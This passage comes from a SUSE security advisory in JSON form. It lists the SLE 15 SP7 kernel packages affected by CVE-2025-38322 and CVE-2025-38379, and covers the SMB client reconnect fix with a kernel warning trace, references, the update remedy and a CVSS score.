"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-38322"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
